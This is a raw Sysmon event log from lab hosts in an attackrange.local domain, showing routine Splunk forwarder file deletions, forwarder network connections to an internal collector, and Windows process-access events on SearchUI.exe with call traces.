08:07:29.365{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0AB2136391C4F7382B725A65225406BE,SHA256=DACA5D0F89C4FC1C2B828F713C90949FFA26993EDB6B52897D3FC0E5D2CD2123,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810372Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:30.959{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71C07E44094A3545F8E568B78646AB06,SHA256=76DBDFEEFA945E20E5C43EE4302509C3D5175D89E79BB6D6C0330D5FE32F5047,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:30.612{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20B4CD059D85B52E2BA58A7E50C653F1,SHA256=F8878340551A4B560D7B01EBC8ED667E9AC38C9166755C227D063AFA3BF2D0B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810371Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:29.186{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57459-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810370Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:30.209{0C1E0330-0490-60E8-1200-00000000D001}980NT 
AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=A65DC1FB8FB86280A2AEC9E30239EECA,SHA256=FFBDD5B830A8C2607336D68FAA6DE8F8A3DB74C7FA65679D14AAD0C429AE7FFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810373Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:31.975{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F37AAC636B84D5FADD5059BF6F68DC9,SHA256=75E78D043D4D817504E6698D6FB0D076D02C574C49FEC51541AF20B62BBD15E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:31.613{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=159006FDB96131AE84A08F5E03353511,SHA256=6C38C96B5BCC20A31234C95EA6FB4AB71EECDD63DBE319B8478109A4CC142C13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810374Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:32.975{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67DE9A7DBE7728C503231F3853E78ED3,SHA256=717C6B17499D27212B0DE05BB0EFC9EA76DCF5B575D7E1283273B88682822887,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:32.631{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84DA9421507A826494B966600A63DC44,SHA256=8A067A4F23647BEB8F3B9E2E088059A2BB5E9698A76CB2999EE06EAE082809CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:33.650{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1740B0E1F7683E1314208D612FF5B9BF,SHA256=206F085263A495CCFB666F16D1F567908F769DDC28C5C864AE0DEAAECE95F718,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:34.666{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB8B0766E7A242A6C8BE37AE8170E621,SHA256=CA63F7DA6F6B690B25393137C1E5D4B31DE631BFED91290D58A65E324362FAFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810375Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:34.022{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48929CADCAF147094CA8559D69D3A905,SHA256=BCCD0C6C72BDE521AC9AD7ECD7D6002432321C23201CEA9ADD311F388ABD9BCE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001054537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:34.066{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=FDBDE5508BB9A863E225C9B2B8B857E1,SHA256=1A47C63F0D9AD52D59DC705745D861F0BBF5E5F2E58F4A0F74EC846EF7968ABD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.812{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FC0AAF5C8668A063BF0AFF458454F6C,SHA256=BDB2CE1DF2971BD8F9ABD7960E7CAC5F1DEEC65E57156B56F41EB4804F711DD6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:27.608{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61966-false10.0.1.12-8000- 354300x8000000000000000810377Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:34.280{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57460-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810376Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:35.032{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FDE3576A929A954AA1264D96B4D9456,SHA256=1DEFF171E4AAB02F971BC1974B4C2D1EDD2E1BBB76DEBDDCD834C6F9EF5E60BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.496{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001054568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.496{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001054567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.482{466BC892-32D3-60E8-770B-00000000CF01}63565780C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.482{466BC892-32D3-60E8-770B-00000000CF01}63565780C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.482{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.482{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.434{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.412{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 
10341000x80000000000000001054561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.396{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001054560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.396{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001054559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.396{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001054558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.396{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001054557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:35.396{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001054556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001054555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
